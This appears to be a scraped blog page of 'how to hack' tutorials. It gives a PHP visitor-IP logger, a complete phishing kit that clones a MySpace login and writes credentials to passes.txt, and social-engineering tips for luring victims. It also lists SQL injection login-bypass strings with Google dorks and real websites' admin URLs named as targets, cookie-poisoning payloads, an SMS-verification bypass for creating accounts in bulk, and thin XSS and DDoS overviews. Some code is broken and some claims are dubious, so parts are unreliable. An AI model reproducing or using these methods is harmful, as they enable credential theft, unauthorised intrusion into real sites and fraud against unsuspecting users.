How to Hack Someones IP Address?

 

Alright, I'm gonna give you this script, that you write in the index.php. It will redirect them to http://www.google.com/, but you can change that in the script.

Here is the sript:

Code:

$file = 'IPz.txt';
$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location: http://google.com/'); }
fwrite($handle, $_GET['p'].': '.$_SERVER['REMOTE_ADDR'].'\r\n');
fclose($handle)
?>

1. First of all you need to make a new .txt document on the website you're uploading this to. Call it IPz.txt (You can change that in the script aswell where it says $file = 'IPz.txt'; in the second line. Then change the CHMOD to 777.

2. Now you need to past the script above in to a .php document, and upload it.

3. Now you make people visit your site, and they will get redirected to Google.

4. To view the IP, you simply add "/IPz.txt" after your domain, and you'll see the IP.

This is a very simple, but effectually method for stealing someones IP Address.
Hope you'll find this tutorial useful. Happy Hacking

Read More ->>

How to Create a Phisher For a Website?

1. Intro
There are couple of other phishing tutorials around here, but some people seem to
have problems understanding them. So I'll try to be as simple as possible, and if you
have problems understanding it, then you need to get some beginner level computer
knowledge first.
-This article was written for educational purpose only. I'm not responsible for any
illegal activity that you may commit.

2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the
username and the password to a file, or does whatever you want.

3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to spam.com and sign up for a free account. In this tutorial we
will make a phishing site for Myspace(the procedure is equivalent for most of the
sites). While not signed in myspace, open anyone's profile and click on his picture.
That will lead you to Myspace's login page that has the red box with"You Must Be
Logged-In to do That!" just above your login form. Now, click File>Save Page As, and
save the myspace page to your Desktop. Open your saved page with any text
editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source
code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the
same function as if it were on the original site. The link to your phish site will be
'www.xxx.t35.com/index.php' - where 'xxx' is the name of your account.

But there is a little problem. When someone enters his username and password and
press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging
them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in
button, search button, etc.). We need to find the 'action=some link' that refers to
the Login button.

After some searching, we find the:
<h5 class="heading">
Member Login
</h5>
<form action="http://secure.myspace.com/index.cfm?
fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYW
NrS2V5X18WAgUwY3RsMDAkT
WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGw
wMCRNYWluJFNwbGFzaERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24="
/>
</div>

and we know that 'action="http://secure.myspace.com/index.cfm?
fuseaction=login.process"' refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"
and save the file.
Formerly, when you click the login button it would take the values in the username and
password boxes, and execute the functions in the
'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in
password boxes, and execute the functions in the 'login.php' file on your site(which
doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that
writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code
in it:

<?php
header ('Location: http://myspace.com/
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $val
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

The function of login.php is simple. It opens a file named 'passes.txt'(and creates
if it doesn't already exist) and enter the informations there(the username and
password).
Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.t35.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.t35.com/passes.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and
passes.txt. but the .php and .txt must stay the same.

Note that you can choose whatever names you like for index.php, login.php and
passes.txt. but the .php and .txt must stay the same.
 

4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.
Most common way is to make an email similar to the admin, and sending them some
report with a link to log in the site(your phish site). Ofcourse you will mask the link.
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing
this:
[url=YourPhishSiteLink]TheOriginalSiteLink[/url]
For example, www.google.com looks like a google, but it leads you to yahoo when you
click it.

If you're making the phisher for myspace, and want to get random ppl to it, you can
simply make some hot chick account and put some hot pic that will lead to your phish
site when clicked. So when they click the lusty image, they will be led to your phish
site telling them they need to log in to see that.
Like this:
[url=YourPhishSiteLink][img]link of the image[/img][/url]
When sending emails see for the option 'hyperlink', and it's self explainable once you
see it.
There are many other ways, and as I said, your creativity is the limit.
 

5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a
phisher, and how it works. Although is written for Myspace, the procedure is
equivalent for almost every other login site(for hotmail is different). After this, it's
up to you to explore, experiment and dive in the world of social engineering.

Read More ->>

How to Hack PHP 4.4 site with Simple Method ?

Now here is a real hacking tutorial in which I am going to hack a real website,and that too in less than 20 seconds.and I am not kidding. Actually sites with PHP 4.4 have a SQL injection vulnerability in them which makes their Admin control panel easily accessible,and I mean in one big shot,you will be admin of that site.

Remember,this tutorial is applicable on PHP4.4 machines with Apache running in parallel with them.Also,since I will be hacking REAL websites,I will not be displaying their URL’s or else I will be gunned down (by law of course ).

Here is how you can start -

Step 1 – Search for them

Yep,make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.

Step 2 – Scan them

Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.

Now just login using port 2000 ie -

"http://www.website.com:2000/"
and you will be comfortably login into admin page like this -

Step 3 – Hack them

Now in the fields,you have to type -

username – admin

password – a’ or 1=1 or ‘b

domain – a’ or 1=1 or ‘b

and press go,you will login into admin

voila..you have hacked into admin. Actually sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.

Read More ->>

How to Bypass Phone and SMS verification of Any Website

Now a days, almost most websites need sms verification which includes google, facebook, youtube and other survey websites.

First of all we should understand why SMS and Phone Verification System is Important?

* Keep More Visitors for Market

* Providing Extra Security for their Website
* Keep Spammers out
* Daily Advertisement and promotional ads daily

Rather we can able to create and Bypass gmail (facebook, youtube, other shopping sites) without SMS verification. Because gmail allow to create only few account. When you try to create more account with same mobile number, google restricted and you can't create more account. so we can create counterless gmail accounts using following steps.

This method is very useful to Bypass SMS verification and useful when you need to Sign up any account and do not feel comfortable to giving your real number or if you want to create multiple account.

Lets Start Step by Step:

1) First go to this Website : Receive-Sms Online

2) Copy any one number and paste it where they are asking SMS Verification.

3) Simply come back and click the number which you have selected, check it out there is your code sent by google, youtube or whatever else.

Read More ->>

How to Hack Any Website with password cracking

Password Cracking

Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it.
You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.

Know more about Brute force attack

A Few Defensive Measures

* If you utilize a web content management system, subscribe to the development blog. Update to new versions soon as possible.
* Update all 3rd party modules as a matter of course — any modules incorporating web forms or enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
* Harden your Web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.
* If you have an admin login page for your custom built CMS, why not call it 'Flowers.php' or something, instead of “AdminLogin.php” etc.?
* Enter some confusing data into your login fields like the sample Injection strings shown above, and any else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray vulnerability.
* Do a few Google hacks on your name and your website. Just in case…
* When in doubt, pull the yellow cable out! It won't do you any good, but hey, it rhymes.

Read More ->>

Hack any Website with Cookie Poisoning

Cookie Poisoning:

Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection

Both have 'OR'1'='1 or maybe '1'='1'

But in cookie poisoning you begin with alerting your cookies

Javascript:alert(document.cookie)

Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe"

in this case the cookie poisoning could be:

Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");

It is also many versions of this kind... like for example

'

'1'='1'

'OR'1'='1

'OR'1'='1'OR'

and so on...

You may have to try 13 things before you get it completely right...

Read More ->>

How to Hack Website Using Cross site scripting ( XSS ) OR Denial of service ( Ddos attack )

 Cross site scripting ( XSS ):

Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a website to gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users so they could place the necessary security systems to block cross-site scripting on their website.

 Denial of service ( Ddos attack )

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking

Read More ->>

What is SQL injection and Demo Of Basic SQL injection for website hacking

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).  I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.


Dorks: inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx


# Try to make your own dorks also to get more success rate.


Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1


Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website. 


Some websites which I got:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx





Other InjecTion Queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

Read More ->>